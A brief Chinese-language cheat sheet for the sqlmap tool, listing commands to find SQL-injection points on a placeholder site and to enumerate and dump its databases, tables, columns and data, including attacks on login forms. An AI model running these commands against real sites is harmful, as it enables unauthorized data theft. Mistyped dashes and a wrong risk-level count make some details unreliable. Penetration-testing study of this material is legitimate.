Sqlmap常见命令速记

简介

SqlMap是一个基于Python的工具。
Python下载官网地址：https://www.python.org/downloads/

Sqlmap注入的一般流程

一、判断是否存在注入点

二、查询数据库信息

三、根据数据库爆破数据表

四、根据数据库名和数据表名爆破字段名

五、爆破字段里面的数据

Sqlmap注入的命令参数

1、判断注入点：sqlmap.py -u url（目标地址）

• -u：指定地址

2、爆破数据库名：sqlmap.py -u http://xxx.com/?id=1 --dbs

• –dbs：查看所有数据库名
• –current-db：查看当前使用的数据库

3、爆破数据表名：sqlmap.py -u http://xxx.com/?id=1 –D 库名 –-tables

• -D：指定数据库名
• –tables：查看指定库下面的所有的表名

4、爆破字段名sqlmap.py -u http://xxx.com/?id=1 -D 库名 –T 表名 –-columns

• -T:指定表名
• –columns:查看指定库的表中的所有字段名

5、爆破所有数据 sqlmap.py -u http://xxx.com/?id=1 -D 库名 –T 表名 -C 字段名 –-dump

• -C：指定字段名
• –dump：根据指定的库、表、字段爆破里面的数据

其他网页命令参数

Sqlmap对伪静态进行注入sqlmap.py -u http://xxx.com/abc/1*.html –-dbs
(* 表示指定注入点)

Sqlmap对登陆框（表单）进行注入sqlmap.py -u http://xxx.com/admin/index.php --form

其他命令选项：

--batch：自动选择
--flush-session：清除缓存 //简写 –z flu
--level:共有五个等级，默认为1，等级越高，测试的内容也越多
--risk：共有四个风险等级，默认是1，等级越高，用来测试的语句也更多
-v：显示详细扫描信息，共有5个等级